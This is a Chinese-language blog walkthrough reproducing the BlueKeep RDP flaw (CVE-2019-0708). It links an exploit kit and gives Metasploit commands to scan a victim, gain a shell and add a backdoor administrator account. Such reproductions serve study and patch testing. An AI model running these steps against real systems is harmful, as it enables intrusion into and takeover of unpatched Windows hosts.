WEB渗透与网络安全

CVE-2019-0708漏洞复现

2020-09-21  本文已影响0人  YPL8

Microsoft Windows 远程桌面服务远程执行代码漏洞(CVE-2019-0708)漏洞复现

详细描述

当未经身份验证的攻击者使用 RDP 连接到目标系统并发送经特殊设计的请求时,远程桌面服务(以前称为“终端服务”)中存在远程执行代码漏洞。此漏洞是预身份验证,无需用户交互。

漏洞影响版本

Windows 7
Windows server 2008 R2
Windows server 2008
Windows 2003
Windows xp

环境

攻击机:Kali-Linux-2020.1

#免安装版本
链接:https://pan.baidu.com/s/1oITUiekxB78u6tvRQ8ELXw  提取码:xayr

漏洞验证

1、更新msf

apt-get update 
image.png
apt-get install metasploit-framework
image.png

2、下载攻击套件

github:https://github.com/TinToSer/bluekeep-exploit
百度云盘:https://pan.baidu.com/s/1CR04VKTegL2Qzn-6Y8av8A  提取码:2506 

3、替换msf中相应的文件

cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cp cve_2019_0708_bluekeep_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
image.png

4、启动msf

msfconsole
image.png

5、使用reload_all加载文件

reload_all
image.png

6、搜索0708,可以看到文件成功加载

search 2019_0708
image.png

7、使用扫描模块(scanner)

use  auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
set rhost 10.xx.xx.xx //这里的ip填写受害机地址
run
image.png
image.png

如发现上图红色箭头指向:The target is vulnerable,证明目标主机存在0708漏洞,可以利用
8、漏洞利用

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set rhost 10.xx.xx.xx //这里的ip填写受害机地址
set rport 3389  //受害机远程端口
set target 1    //可以先从1开始;选择3,受害机可能会蓝屏(谨慎!)
show options
run
image.png
image.png

9、漏洞利用成功,操控受害机

getuid  //获取目前进程的用户识别码
shell
#添加一个zzzz用户,密码为123456
net user zzzz 123456 /add  //net user 用户名 密码 /add
net localgroup administrators zzzz /add  //把zzzz用户加入管理员组去
image.png
image.png
上一篇 下一篇

猜你喜欢

热点阅读